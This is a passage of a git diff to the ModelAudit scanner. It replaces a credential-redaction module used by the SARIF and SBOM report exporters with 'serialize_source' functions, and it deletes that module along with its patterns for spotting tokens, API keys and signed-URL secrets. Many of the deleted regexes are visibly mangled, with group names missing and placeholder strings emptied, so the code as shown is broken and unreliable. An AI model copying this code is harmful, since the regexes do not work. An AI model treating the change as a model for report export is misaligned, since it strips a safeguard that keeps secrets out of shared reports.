- if isinstance(value, frozenset): - return frozenset(_redact_catboost_details_for_sarif(item) for item in value) - # Unknown structured values and binary evidence still take the conservative - # generic path before the prevalidated source pass sees them. - return _redact_value_for_sarif(value) - - def _create_artifacts(audit_result: ModelAuditResultModel) -> list[dict[str, Any]]: """Create SARIF artifacts from scanned files.""" artifacts: list[dict[str, Any]] = [] @@ -366,7 +335,7 @@ def _create_artifacts(audit_result: ModelAuditResultModel) -> list[dict[str, Any artifact["hashes"] = hashes member_file_hashes = getattr(metadata, "member_file_hashes", None) if member_file_hashes: - artifact["properties"]["memberFileHashes"] = _redact_value_for_sarif( + artifact["properties"]["memberFileHashes"] = serialize_source_value( { member_path: ( record.model_dump(mode="json", exclude_none=True) @@ -407,11 +376,11 @@ def _get_rule_id(issue: Any) -> str: return rule_code if hasattr(issue, "type") and issue.type: - redacted_type = _redact_text_for_sarif(str(issue.type)) + redacted_type = serialize_source_text(str(issue.type)) return f"MA{redacted_type.replace(' ', '-').upper()}" # Generate from message if no type - redacted_message = _redact_text_for_sarif(issue.message) + redacted_message = serialize_source_text(issue.message) base = redacted_message[:30].replace(" ", "-").replace(":", "").upper() # Remove special characters base = "".join(c if c.isalnum() or c == "-" else "" for c in base) @@ -422,17 +391,17 @@ def _get_issue_rule_code(issue: Any) -> str | None: """Return the stable ModelAudit rule code for an issue when available.""" rule_code = getattr(issue, "rule_code", None) if isinstance(rule_code, str) and rule_code: - return _redact_text_for_sarif(rule_code) + return serialize_source_text(rule_code) return None def _get_rule_name(issue: Any) -> str: """Get a human-readable rule name from an issue.""" if hasattr(issue, "type") and issue.type: - return _redact_text_for_sarif(str(issue.type)).replace("_", " ").title() + return serialize_source_text(str(issue.type)).replace("_", " ").title() # Extract from message - redacted_message = _redact_text_for_sarif(issue.message) + redacted_message = serialize_source_text(issue.message) return str(redacted_message.split(":")[0] if ":" in redacted_message else redacted_message[:50]) @@ -454,7 +423,7 @@ def _get_rule_short_description(issue: Any) -> str: elif "blacklist" in lowered_message: return "Blacklisted model name detected" else: - return str(_redact_text_for_sarif(issue.message)[:100]) + return str(serialize_source_text(issue.message)[:100]) def _get_rule_full_description(issue: Any) -> str: @@ -462,7 +431,7 @@ def _get_rule_full_description(issue: Any) -> str: desc = _get_rule_short_description(issue) if hasattr(issue, "why") and issue.why: - desc += f" {_redact_text_for_sarif(issue.why)}" + desc += f" {serialize_source_text(issue.why)}" return desc @@ -514,7 +483,7 @@ def _get_tags_for_issue(issue: Any) -> list[str]: def _normalize_path_to_uri(path: str) -> str: """Normalize a file path to a URI format.""" - path = _redact_path_for_sarif(path) + path = serialize_source_identifier(path) # Convert to Path object for normalization p = Path(path) diff --git a/modelaudit/integrations/sbom_generator.py b/modelaudit/integrations/sbom_generator.py index 333225e1e..9a6148706 100644 --- a/modelaudit/integrations/sbom_generator.py +++ b/modelaudit/integrations/sbom_generator.py @@ -15,7 +15,7 @@ from ..models import FileMetadataModel, ModelAuditResultModel from ..scanner_results import Issue, IssueSeverity -from .source_redaction import redact_source_identifier, redact_source_reference, redact_source_value +from .source_serialization import serialize_source_identifier, serialize_source_value SCANNER_VERSION = f"v{_pkg_version('modelaudit')}" _MAX_SYMLINK_HOPS = 40 @@ -36,7 +36,7 @@ def _sbom_property_value(value: object) -> str: def _serialize_member_file_hashes(value: object) -> str: - return json.dumps(redact_source_value(value), sort_keys=True, separators=(",", ":")) + return json.dumps(serialize_source_value(value), sort_keys=True, separators=(",", ":")) def _append_member_file_hash_summary_properties(props: list[Property], metadata: FileMetadataModel) -> None: @@ -479,27 +479,37 @@ def _is_non_filesystem_identifier(path: str) -> bool: return False -def _redacted_component_identity( - path: str, - sha256: str = "", - bom_ref_state: _BomRefState | None = None, -) -> tuple[str, str]: - """Return credential-safe component name and bom-ref values for exported SBOMs.""" - safe_identifier = redact_source_identifier(path) - component_name = os.path.basename(safe_identifier) or safe_identifier - if safe_identifier == path: - base_reference = safe_identifier - else: - base_reference = redact_source_reference(path) - if sha256: - base_reference = f"{base_reference}#modelaudit-content-sha256-{sha256}" - - if bom_ref_state is None: - return component_name, base_reference - return component_name, bom_ref_state.allocate( - base_reference, - literal_reference=safe_identifier == path, - ) +def _component_identity(path: str, sha256: str, bom_ref_state: _BomRefState | None = None) -> tuple[str, str]: + """Preserve source identities and disambiguate bounded or expanded references.""" + identifier = serialize_source_identifier(path) + reference = identifier + if identifier != path and sha256: + reference = f"{reference}#modelaudit-content-sha256-{sha256}" + if bom_ref_state: + reference = bom_ref_state.allocate(reference, literal_reference=identifier == path) + return os.path.basename(identifier) or identifier, reference + + +def _source_order( + paths: Iterable[str], risk_score: Callable[[str], int], metadata_for: Callable[[str], Any] +) -> list[str]: + """Sort raw sources, retaining tie order when oversized identifiers are bounded.""" + + def order_key(path: str) -> tuple[str, bool, int, str]: + identifier = serialize_source_identifier(path) + if identifier == path: + return identifier, False, 0, "" + metadata = metadata_for(path) + if hasattr(metadata, "model_dump"): + metadata = metadata.model_dump(mode="python") + metadata = serialize_source_value(metadata or {}) + if isinstance(metadata, dict): + metadata.pop("risk_score", None) + metadata.pop("scan_timestamp", None) + encoded = json.dumps(metadata, sort_keys=True, separators=(",", ":"), default=repr) + return identifier, True, -risk_score(path), hashlib.sha256(encoded.encode()).hexdigest() + + return sorted(dict.fromkeys(paths), key=order_key) def _trusted_metadata_fallback_paths(assets: Iterable[Any] | None) -> set[str]: @@ -551,47 +561,6 @@ def _calculate_legacy_risk_score(path: str, issues: Iterable[dict[str, Any]]) -> return min(score, 10) -def _stable_source_order( - paths: Iterable[str], - risk_score: Callable[[str], int], - metadata_identity: Callable[[str], str] | None = None, -) -> list[str]: - """Order sources so colliding redacted refs keep deterministic risk attribution.""" - grouped_paths: dict[str, list[str]] = {} - seen_paths: set[str] = set() - for path in paths: - if path in seen_paths: - continue - seen_paths.add(path) - reference = redact_source_reference(path) - grouped_paths.setdefault(reference, []).append(path) - - ordered_paths: list[str] = [] - for reference in sorted(grouped_paths): - ordered_paths.extend( - sorted( - grouped_paths[reference], - key=lambda path: ( - redact_source_identifier(path) != path, - -risk_score(path), - metadata_identity(path) if metadata_identity is not None else "", - ), - ) - ) - return ordered_paths - - -def _metadata_identity_sort_key(metadata: Any) -> str: - if hasattr(metadata, "model_dump"): - metadata = metadata.model_dump(mode="python") - safe_metadata = redact_source_value(metadata or {}) - if isinstance(safe_metadata, dict): - safe_metadata.pop("risk_score", None) - safe_metadata.pop("scan_timestamp", None) - serialized = json.dumps(safe_metadata, sort_keys=True, separators=(",", ":"), default=repr) - return hashlib.sha256(serialized.encode()).hexdigest() - - def _extract_license_expressions(metadata: FileMetadataModel) -> list[LicenseExpression]: """Extract license expressions from file metadata.""" license_expressions: list[LicenseExpression] = [] @@ -726,7 +695,7 @@ def _component_for_file_pydantic( # Determine appropriate component type for CycloneDX v1.6 component_type = _get_component_type(path, metadata.model_dump() if metadata else None) - component_name, bom_ref = _redacted_component_identity(path, sha256, bom_ref_state) + component_name, bom_ref = _component_identity(path, sha256, bom_ref_state) # Create the component component = Component( @@ -859,7 +828,7 @@ def _component_for_file( # Determine appropriate component type for CycloneDX v1.6 component_type = _get_component_type(path, metadata if isinstance(metadata, dict) else None) - component_name, bom_ref = _redacted_component_identity(path, sha256, bom_ref_state) + component_name, bom_ref = _component_identity(path, sha256, bom_ref_state) component = Component( name=component_name, @@ -890,14 +859,8 @@ def generate_sbom(paths: Iterable[str], results: dict[str, Any] | Any) -> str: file_meta: dict[str, Any] = results.get("file_metadata", {}) trusted_metadata_paths = _trusted_metadata_fallback_paths(results.get("assets", [])) - ordered_paths = _stable_source_order( - paths, - lambda path: _calculate_legacy_risk_score(path, issues_dicts), - lambda path: _metadata_identity_sort_key(file_meta.get(path)), - ) - bom_ref_state = _BomRefState( - reserved={redact_source_reference(path) for path in ordered_paths if redact_source_identifier(path) == path} - ) + ordered_paths = _source_order(paths, lambda path: _calculate_legacy_risk_score(path, issues_dicts), file_meta.get) + bom_ref_state = _BomRefState(reserved={path for path in ordered_paths if serialize_source_identifier(path) == path}) for input_path in ordered_paths: is_remote_identifier = _is_non_filesystem_identifier(input_path) if not is_remote_identifier and os.path.isdir(input_path): @@ -982,14 +945,8 @@ def generate_sbom_pydantic(paths: Iterable[str], results: ModelAuditResultModel) file_metadata: dict[str, FileMetadataModel] = results.file_metadata or {} trusted_metadata_paths = _trusted_metadata_fallback_paths(results.assets) - ordered_paths = _stable_source_order( - paths, - lambda path: _calculate_risk_score(path, issues), - lambda path: _metadata_identity_sort_key(file_metadata.get(path)), - ) - bom_ref_state = _BomRefState( - reserved={redact_source_reference(path) for path in ordered_paths if redact_source_identifier(path) == path} - ) + ordered_paths = _source_order(paths, lambda path: _calculate_risk_score(path, issues), file_metadata.get) + bom_ref_state = _BomRefState(reserved={path for path in ordered_paths if serialize_source_identifier(path) == path}) for input_path in ordered_paths: is_remote_identifier = _is_non_filesystem_identifier(input_path) if not is_remote_identifier and os.path.isdir(input_path): diff --git a/modelaudit/integrations/source_redaction.py b/modelaudit/integrations/source_redaction.py deleted file mode 100644 index afaeab949..000000000 --- a/modelaudit/integrations/source_redaction.py +++ /dev/null @@ -1,1100 +0,0 @@ -"""Credential-safe source identifier redaction for exported reports.""" - -import os -import re -from typing import Any -from urllib.parse import parse_qsl, unquote, urlencode, urlsplit, urlunsplit - -from pydantic import AnyUrl, BaseModel - -from modelaudit.utils.sources.cloud_storage import ( - _normalize_percent_encoded_url_authority_for_display as _normalize_percent_encoded_url_authority_for_display, -) -from modelaudit.utils.sources.cloud_storage import ( - _normalize_percent_encoded_url_delimiters_for_display as _normalize_percent_encoded_url_delimiters_for_display, -) -from modelaudit.utils.sources.cloud_storage import is_sensitive_credential_key, is_stream_url -from modelaudit.utils.sources.cloud_storage import ( - normalize_escaped_url_delimiters_for_display as _normalize_escaped_url_delimiters_for_display, -) -from modelaudit.utils.sources.cloud_storage import redact_cloud_error_for_display as _redact_cloud_error_for_display -from modelaudit.utils.sources.cloud_storage import redact_stream_url_for_display as _redact_stream_url_for_display -from modelaudit.utils.sources.cloud_storage import redact_url_for_display as _redact_url_for_display - -_URL_TEXT_CHARACTER = r'(?:[^\s"\'<>]||)' -_URL_TOKEN_RE = re.compile( - rf"(?(?:(?P[a-z][a-z0-9+.-]*):/{1,2}|//)?)" - r"(?P[^/\s?#@]+(?:@|%(?:25)*40))" - r"(?P[^/\s?#@]+)(?P.*)$", - re.IGNORECASE, -) -_USERINFO_TOKEN_RE = re.compile( - r"(?" - r"(?:(?:[a-z][a-z0-9+.-]*):/{1,2}|//)?" - r"[^\s\"'<>/@?#]+(?:@|%(?:25)*40)" - r"[^\s\"'<>/\\?#@]+(?:[\\/][^\s\"'<>]*)?" - r")", - re.IGNORECASE, -) -_SCHEMELESS_SUFFIX_TOKEN_RE = re.compile( - rf"(?" - rf"(?:(?:[a-z]:[\\/]|/|\.\.?/)?(?:[^\s\"'<>/?#]+/)+)" - rf"[^\s\"'<>?#]+[?#;]{_URL_TEXT_CHARACTER}+" - rf")", - re.IGNORECASE, -) -_SCHEMELESS_ENCODED_SUFFIX_TOKEN_RE = re.compile( - rf"(?" - rf"(?:(?:[a-z]:[\\/]|/|\.\.?/)?(?:[^\s\"'<>/?#]+/)+)" - rf"[^\s\"'<>?#]+%(?:25)*(?:3f|23|3b){_URL_TEXT_CHARACTER}+" - rf")", - re.IGNORECASE, -) -_BARE_SUFFIX_TOKEN_RE = re.compile( - rf"(?" - rf"[0-9A-Za-z._~-]+\.[A-Za-z][0-9A-Za-z]{{0,15}}" - rf"[?#;]{_URL_TEXT_CHARACTER}+" - rf")", - re.IGNORECASE, -) -_BARE_ENCODED_SUFFIX_TOKEN_RE = re.compile( - rf"(?" - rf"[0-9A-Za-z._~-]+\.[A-Za-z][0-9A-Za-z]{{0,15}}" - rf"%(?:25)*(?:3f|23|3b){_URL_TEXT_CHARACTER}+" - rf")", - re.IGNORECASE, -) -_EMAIL_SUFFIX_TOKEN_RE = re.compile( - rf"(?" - rf"[0-9A-Za-z._%+-]+@[0-9A-Za-z.-]+\.[A-Za-z]{{2,}}" - rf"[?#]{_URL_TEXT_CHARACTER}+" - rf")", - re.IGNORECASE, -) -_WINDOWS_DRIVE_PATH_RE = re.compile(r"^[a-z]:[\\/]", re.IGNORECASE) -_ENCODED_ASSIGNMENT_SEPARATOR_RE = re.compile(r"%(?:25)*(?:3a|3d)", re.IGNORECASE) -_ENCODED_MAJOR_SUFFIX_RE = re.compile(r"%(?:25)*(?:3f|23|3b)", re.IGNORECASE) -_ENCODED_FILENAME_SUFFIX_RE = re.compile(r"^[0-9A-Za-z._~-]+\.[0-9A-Za-z]{1,16}$") -_ENCODED_AT_RE = re.compile(r"%(?:25)*40", re.IGNORECASE) -_EXPORT_KEY_TOKEN = r"(?:[0-9A-Za-z_%.-]|\\(?:u[0-9A-Fa-f]{4}|x[0-9A-Fa-f]{2}))+" -_EXPORT_BRACKET_KEY = rf"\[\s*(?:{_EXPORT_KEY_TOKEN}|\"{_EXPORT_KEY_TOKEN}\"|'{_EXPORT_KEY_TOKEN}')?\s*\]" -_EXPORT_QUOTED_VALUE = r"""(?:"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')""" -_ESCAPED_KEY_CHARACTER_RE = re.compile( - r"\\(?:u(?P[0-9A-Fa-f]{4})|x(?P[0-9A-Fa-f]{2}))", - re.IGNORECASE, -) -_MAX_REDACTION_DEPTH = 32 -_MAX_SOURCE_TEXT_CHARS = 256 * 1024 -_MAX_PROVENANCE_QUERY_CHARS = 4096 -_MAX_PROVENANCE_PARAMS = 16 -_SAFE_PROVENANCE_QUERY_KEYS = frozenset({"branch", "ref", "revision", "tag", "version"}) -_SAFE_PROVENANCE_VALUE_RE = re.compile(r"^[0-9A-Za-z._~:+/-]{1,128}$") -_EXPORT_ASSIGNMENT_RE = re.compile( - r"(?\\?)(?P[\"'])" - rf"(?P{_EXPORT_KEY_TOKEN}(?:{_EXPORT_BRACKET_KEY})*)(?P=key_escape)(?P=quote)" - rf"|(?P{_EXPORT_KEY_TOKEN}(?:{_EXPORT_BRACKET_KEY})*))" - r"(?P\s*(?::|(?])=(?!=)|<\\?)(?P[\"'])" - rf"(?P{_EXPORT_KEY_TOKEN}(?:{_EXPORT_BRACKET_KEY})*)(?P=key_escape)(?P=quote)" - rf"|(?P{_EXPORT_KEY_TOKEN}(?:{_EXPORT_BRACKET_KEY})*))" - r"(?P\s*={2,}\s*)", - re.IGNORECASE, -) -_EXPORT_EQUALS_KEY_RE = re.compile( - r"(?[0-9A-Za-z_%.-]+)(?P\s*=\s*)", - re.IGNORECASE, -) -_EXPORT_HEADER_KEY_RE = re.compile( - r"(?[\"']?)(?P[0-9A-Za-z_%.-]+)(?P=quote)(?P\s*:\s*)", - re.IGNORECASE, -) -_EXPORT_ENCODED_SEPARATOR_RE = re.compile( - r"(?[0-9A-Za-z_%.-]+?)" - r"(?P%(?:25)*(?P3a|3d)(?:%(?:25)*20)*)", - re.IGNORECASE, -) -_EXPORT_OPTION_RE = re.compile( - rf"(?--(?P[0-9A-Za-z_%.-]+)\s+)(?P{_EXPORT_QUOTED_VALUE}|[^\s,;]+)", - re.IGNORECASE, -) -_EXPORT_AUTHORIZATION_RE = re.compile( - r"(?(?P(?:proxy[_.-]?)?authorization)\s+" - r"(?!(?:algorithm|enabled|header|method|name|status|type)\b)" - r"[0-9A-Za-z][0-9A-Za-z+._-]{0,63}\s+)" - rf"(?P{_EXPORT_QUOTED_VALUE}|[^\s,;]+)", - re.IGNORECASE, -) -_EXPORT_VALUE_BOUNDARY_RE = re.compile(r"[\r\n,;)}\]]|\s+(?=--[0-9A-Za-z])") -_MAX_CREDENTIAL_KEY_DECODE_PASSES = 4 -_EXPORT_CREDENTIAL_KEY_ALIASES = frozenset( - { - "dbpassword", - "googleaccessid", - "jwt", - "passphrase", - "pwd", - "refreshtoken", - "secretkey", - "sessionid", - "sessiontoken", - } -) -_EXPORT_CREDENTIAL_KEY_TOKENS = frozenset( - { - "auth", - "authorization", - "cookie", - "credential", - "credentials", - "passwd", - "password", - "secret", - "session", - "sig", - "signature", - "token", - } -) -_EXPORT_CREDENTIAL_KEY_NEAR_MATCHES = frozenset( - { - "accesstokencount", - "apikeyhint", - "apikeyvalueset", - "authorizationheadername", - "authorizationmethod", - "authorizationstatus", - "googleaccessidentifier", - "mysecretingredient", - "passwordpolicy", - "privatekeyformat", - "proxyauthorizationenabled", - "requestsignaturealgorithm", - "sessiontokencache", - "signaturealgorithm", - "tokencount", - "tokentypeid", - "tokentypeids", - "tokenizer", - } -) -_EXPORT_SAFE_METADATA_KEY_SUFFIXES = ( - "authmethod", - "authenticationmethod", - "authorizationmethod", - "passwordlength", - "sessionduration", - "signaturealgorithm", - "tokencount", -) -_CREDENTIAL_SHAPED_PROVENANCE_VALUE_RE = re.compile( - r"(?:gh[pousr]_[0-9A-Za-z_]{20,}|sk-[0-9A-Za-z_-]{12,}|AKIA[0-9A-Z]{16}|" - r"eyJ[0-9A-Za-z_-]{8,}\.[0-9A-Za-z_-]{8,}\.[0-9A-Za-z_-]{8,})" -) - - -def redact_source_identifier(source: str) -> str: - """Return an exported source identifier without signed URL material.""" - if len(source) > _MAX_SOURCE_TEXT_CHARS: - return "" - normalized_source = _normalize_escaped_url_delimiters_for_display(source) - if is_stream_url(normalized_source): - safe_stream_url = _redact_stream_url_for_display(normalized_source[9:]) - if safe_stream_url == "": - return "stream://" - return f"stream://{redact_source_text(safe_stream_url)}" - if _URL_LIKE_PREFIX_RE.match(normalized_source): - try: - authority_normalized_source = _normalize_percent_encoded_url_authority_for_display(normalized_source) - parts = urlsplit(authority_normalized_source) - except Exception: - return "" - if parts.scheme.casefold() == "file" and not parts.username and not parts.password: - comparison_source = _normalize_percent_encoded_url_delimiters_for_display(normalized_source) - comparison_parts = urlsplit(comparison_source) - if _has_sensitive_path_assignment(comparison_parts.path): - return _redact_url_identifier(comparison_source) - if not comparison_parts.query and not comparison_parts.fragment: - return source - if _has_safe_schemeless_provenance_suffix(source): - return source - return _redact_url_identifier(comparison_source) - return _redact_url_identifier(normalized_source) - if normalized_source.startswith("//") and not normalized_source.startswith("///"): - if os.name != "nt" and _local_path_exists(source): - return source - safe_url = _redact_url_identifier(f"https:{normalized_source}") - return safe_url.removeprefix("https:") - if _local_path_exists(source): - return source - - if _is_local_path_identifier(source): - return _redact_local_path_identifier(source) - redacted_userinfo = _redact_userinfo_identifier(normalized_source) - if redacted_userinfo is not None: - return redacted_userinfo - if "@" in normalized_source or _ENCODED_AT_RE.search(normalized_source): - nested_userinfo = _USERINFO_TOKEN_RE.sub( - _redact_nested_userinfo_token, - normalized_source, - ) - if nested_userinfo != normalized_source: - return nested_userinfo - - comparison_source = _normalize_percent_encoded_url_delimiters_for_display(normalized_source) - suffix_indexes = [index for delimiter in "?#;" if (index := comparison_source.find(delimiter)) >= 0] - if suffix_indexes: - suffix_index = min(suffix_indexes) - prefix = comparison_source[:suffix_index] - suffix = comparison_source[suffix_index + 1 :] - if _contains_sensitive_assignment(suffix): - return prefix or "" - if _contains_opaque_suffix_part(suffix): - return prefix or "" - path_prefix = re.split(r"[?#;&]", comparison_source, maxsplit=1)[0] - if _has_sensitive_path_assignment(path_prefix): - return "" - if _has_safe_schemeless_provenance_suffix(source): - if _redact_export_alias_assignments(path_prefix) != path_prefix: - return "" - return source - redacted_source = _redact_export_alias_assignments(comparison_source) - if redacted_source != comparison_source: - suffix_indexes = [index for delimiter in "?#;&" if (index := comparison_source.find(delimiter)) >= 0] - if not suffix_indexes: - return "" - prefix = comparison_source[: min(suffix_indexes)] - if _redact_export_alias_assignments(prefix) != prefix: - return "" - return prefix or "" - encoded_safe_source = _strip_encoded_opaque_suffix(comparison_source) - if encoded_safe_source != comparison_source: - return encoded_safe_source - return source - - -def redact_source_text(text: str) -> str: - """Redact signed URL tokens embedded in exported text fields.""" - return _redact_source_text(text, preserve_redacted_assignments=False) - - -def _redact_prevalidated_source_text(text: str) -> str: - """Redact source identifiers after a domain sanitizer validated markers.""" - return _redact_source_text(text, preserve_redacted_assignments=True) - - -def _redact_source_text(text: str, *, preserve_redacted_assignments: bool) -> str: - if len(text) > _MAX_SOURCE_TEXT_CHARS: - return "" - normalized_text = _normalize_escaped_url_delimiters_for_display(text) - normalized_text = _redact_url_adjacent_assignments(normalized_text) - redacted_text = _URL_TOKEN_RE.sub(lambda match: _redact_url_token(match.group(0)), normalized_text) - if "@" in redacted_text or _ENCODED_AT_RE.search(redacted_text): - redacted_text = _USERINFO_TOKEN_RE.sub( - lambda match: _redact_userinfo_text_token(redacted_text, match), redacted_text - ) - if "/" in redacted_text or "\\" in redacted_text: - redacted_text = _SCHEMELESS_SUFFIX_TOKEN_RE.sub( - lambda match: _redact_schemeless_suffix_token(match.group("identifier")), - redacted_text, - ) - redacted_text = _SCHEMELESS_ENCODED_SUFFIX_TOKEN_RE.sub( - lambda match: _redact_encoded_suffix_token(match.group("identifier")), - redacted_text, - ) - redacted_text = _BARE_SUFFIX_TOKEN_RE.sub( - lambda match: redact_source_identifier(match.group("identifier")), - redacted_text, - ) - redacted_text = _BARE_ENCODED_SUFFIX_TOKEN_RE.sub( - lambda match: redact_source_identifier(match.group("identifier")), - redacted_text, - ) - redacted_text = _EMAIL_SUFFIX_TOKEN_RE.sub( - lambda match: _redact_email_suffix_token(match.group("identifier")), - redacted_text, - ) - return _redact_assignments_outside_url_tokens( - redacted_text, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - - -def _redact_assignments_outside_url_tokens( - text: str, - *, - preserve_redacted_assignments: bool, -) -> str: - """Redact free-text assignments after source tokens have been sanitized.""" - return _redact_export_alias_assignments( - text, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - - -def _redact_url_adjacent_assignments(text: str) -> str: - """Redact credential fields swallowed by a permissive URL token match.""" - url_spans = [(match.start(), match.end()) for match in _URL_TOKEN_RE.finditer(text)] - if not url_spans: - return text - - assignment_starts: list[int] = [] - for pattern in (_EXPORT_EQUALS_KEY_RE, _EXPORT_HEADER_KEY_RE, _EXPORT_ENCODED_SEPARATOR_RE): - for match in pattern.finditer(text): - if not _is_sensitive_export_key(match.group("key")): - continue - preceding = text[: match.start()].rstrip() - if not preceding or preceding[-1] not in ",;": - continue - if any(start <= match.start() < end for start, end in url_spans): - assignment_starts.append(match.start()) - if not assignment_starts: - return text - first_assignment = min(assignment_starts) - return f"{text[:first_assignment]}{_redact_export_alias_assignments(text[first_assignment:])}" - - -def redact_source_reference(source: str) -> str: - """Return a credential-safe source reference with bounded provenance context.""" - safe_identifier = redact_source_identifier(source) - if safe_identifier == source: - return safe_identifier - normalized_source = _normalize_percent_encoded_url_delimiters_for_display( - _normalize_escaped_url_delimiters_for_display(source) - ) - try: - parts = urlsplit(normalized_source) - except Exception: - return safe_identifier - - safe_params: list[tuple[str, str]] = [] - for raw_params, key_prefix in ((parts.query, ""), (parts.fragment, "fragment-")): - if not raw_params or len(raw_params) > _MAX_PROVENANCE_QUERY_CHARS: - continue - for key, value in parse_qsl(raw_params, keep_blank_values=True)[:_MAX_PROVENANCE_PARAMS]: - normalized_key = key.casefold() - if ( - normalized_key in _SAFE_PROVENANCE_QUERY_KEYS - and not _is_sensitive_export_key(normalized_key) - and _SAFE_PROVENANCE_VALUE_RE.fullmatch(value) - and not _looks_like_credential_value(value) - ): - safe_params.append((f"{key_prefix}{normalized_key}", value)) - if not safe_params: - return safe_identifier - return f"{safe_identifier}?{urlencode(sorted(safe_params))}" - - -def _has_safe_schemeless_provenance_suffix(source: str) -> bool: - """Preserve bounded, explicitly non-sensitive assignments in local-looking names.""" - normalized_source = _normalize_percent_encoded_url_delimiters_for_display( - _normalize_escaped_url_delimiters_for_display(source) - ) - suffix_indexes = [index for delimiter in "?#;" if (index := normalized_source.find(delimiter)) >= 0] - if not suffix_indexes: - return False - suffix = normalized_source[min(suffix_indexes) + 1 :] - if not suffix or len(suffix) > _MAX_PROVENANCE_QUERY_CHARS: - return False - - assignments = re.split(r"[&#;]", suffix) - if len(assignments) > _MAX_PROVENANCE_PARAMS: - return False - for assignment in assignments: - key, separator, value = assignment.partition("=") - normalized_key = key.casefold() - if ( - not separator - or normalized_key not in _SAFE_PROVENANCE_QUERY_KEYS - or _is_sensitive_export_key(normalized_key) - or _SAFE_PROVENANCE_VALUE_RE.fullmatch(value) is None - or _looks_like_credential_value(value) - ): - return False - return True - - -def redact_source_value(value: Any) -> Any: - """Recursively redact exported values that may contain source identifiers.""" - return _redact_source_value( - value, - seen=set(), - depth=0, - preserve_redacted_assignments=False, - ) - - -def redact_prevalidated_source_value(value: Any) -> Any: - """Redact source identifiers after a domain sanitizer validated markers.""" - return _redact_source_value( - value, - seen=set(), - depth=0, - preserve_redacted_assignments=True, - ) - - -def _redact_source_value( - value: Any, - *, - seen: set[int], - depth: int, - preserve_redacted_assignments: bool, -) -> Any: - if depth > _MAX_REDACTION_DEPTH: - return "" - if isinstance(value, BaseModel): - return _redact_source_value( - value.model_dump(mode="python"), - seen=seen, - depth=depth + 1, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - if isinstance(value, AnyUrl): - return redact_source_text(str(value)) - if isinstance(value, str): - if preserve_redacted_assignments: - return _redact_prevalidated_source_text(value) - return redact_source_text(value) - if isinstance(value, (bytes, bytearray)): - try: - decoded = bytes(value).decode("utf-8") - if preserve_redacted_assignments: - return _redact_prevalidated_source_text(decoded) - return redact_source_text(decoded) - except UnicodeDecodeError: - return "" - if isinstance(value, dict): - if id(value) in seen: - return "" - seen.add(id(value)) - try: - redacted_mapping: dict[Any, Any] = {} - next_key_occurrences: dict[str, int] = {} - for key, item in value.items(): - redacted_key = _unique_redacted_mapping_key( - _redact_mapping_key(key), - redacted_mapping, - next_occurrences=next_key_occurrences, - ) - redacted_mapping[redacted_key] = ( - "" - if _mapping_key_requires_redaction(key) - else _redact_source_value( - item, - seen=seen, - depth=depth + 1, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - ) - return redacted_mapping - finally: - seen.remove(id(value)) - if isinstance(value, list): - if id(value) in seen: - return "" - seen.add(id(value)) - try: - return [ - _redact_source_value( - item, - seen=seen, - depth=depth + 1, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - for item in value - ] - finally: - seen.remove(id(value)) - if isinstance(value, tuple): - if id(value) in seen: - return "" - seen.add(id(value)) - try: - return tuple( - _redact_source_value( - item, - seen=seen, - depth=depth + 1, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - for item in value - ) - finally: - seen.remove(id(value)) - if isinstance(value, (set, frozenset)): - if id(value) in seen: - return "" - seen.add(id(value)) - try: - return sorted( - ( - _redact_source_value( - item, - seen=seen, - depth=depth + 1, - preserve_redacted_assignments=preserve_redacted_assignments, - ) - for item in value - ), - key=repr, - ) - finally: - seen.remove(id(value)) - return value - - -def _redact_userinfo_identifier(source: str) -> str | None: - match = _USERINFO_IDENTIFIER_RE.match(source) - if match is None: - return None - - scheme = match.group("scheme") - prefix = match.group("prefix") - userinfo = match.group("userinfo") - suffix = match.group("suffix") - if ( - not prefix - and not suffix.startswith(("/", "\\")) - and re.search( - r":|%(?:25)*3a", - userinfo, - re.IGNORECASE, - ) - is None - ): - return None - safe_url = _redact_url_identifier(f"{scheme or 'https'}://{userinfo}{match.group('host')}{suffix}") - if scheme: - return safe_url - - safe_identifier = safe_url.removeprefix("https://") - return f"//{safe_identifier}" if prefix == "//" else safe_identifier - - -def _redact_userinfo_text_token(text: str, match: re.Match[str]) -> str: - identifier = match.group("identifier") - if match.start() > 0 and text[match.start() - 1] in "/\\": - authority = re.split(r"[\\/]", identifier, maxsplit=1)[0] - decoded_authority, _ = _bounded_unquote(authority) - userinfo = decoded_authority.rsplit("@", 1)[0] - if ":" not in userinfo: - return identifier - return redact_source_identifier(identifier) - - -def _redact_nested_userinfo_token(match: re.Match[str]) -> str: - identifier = match.group("identifier") - return _redact_userinfo_identifier(identifier) or identifier - - -def _redact_schemeless_suffix_token(source: str) -> str: - if _URL_LIKE_PREFIX_RE.match(source): - return source - return redact_source_identifier(source) - - -def _redact_encoded_suffix_token(source: str) -> str: - if _URL_LIKE_PREFIX_RE.match(source): - return _redact_url_token(source) - return redact_source_identifier(source) - - -def _redact_email_suffix_token(source: str) -> str: - suffix_indexes = [index for delimiter in "?#" if (index := source.find(delimiter)) >= 0] - if not suffix_indexes: - return source - suffix_index = min(suffix_indexes) - suffix = source[suffix_index + 1 :] - if _contains_sensitive_assignment(suffix) or _contains_opaque_suffix_part(suffix): - return source[:suffix_index] - return source - - -def _redact_url_identifier(source: str) -> str: - source = _strip_encoded_opaque_suffix(source) - if source == "": - return source - safe_url = _redact_url_for_display(source) - if safe_url == "": - return safe_url - return _redact_url_path_assignments(safe_url) - - -def _redact_url_path_assignments(source: str) -> str: - try: - parts = urlsplit(source) - except Exception: - return "" - - safe_segments: list[str] = [] - for segment in parts.path.split("/"): - safe_segments.append(_redact_path_segment_assignment(segment)) - return urlunsplit((parts.scheme, parts.netloc, "/".join(safe_segments), parts.query, parts.fragment)) - - -def _redact_path_segment_assignment(segment: str) -> str: - separator_indexes = [index for delimiter in "=:" if (index := segment.find(delimiter)) >= 0] - encoded_separator = _ENCODED_ASSIGNMENT_SEPARATOR_RE.search(segment) - if encoded_separator is not None: - separator_indexes.append(encoded_separator.start()) - if not separator_indexes: - return segment - key = segment[: min(separator_indexes)] - if _is_sensitive_export_key(key): - return f"{key}=" - return segment - - -def _has_sensitive_path_assignment(path: str) -> bool: - return any(_redact_path_segment_assignment(segment) != segment for segment in re.split(r"[\\/]", path)) - - -def _strip_encoded_opaque_suffix(source: str) -> str: - if 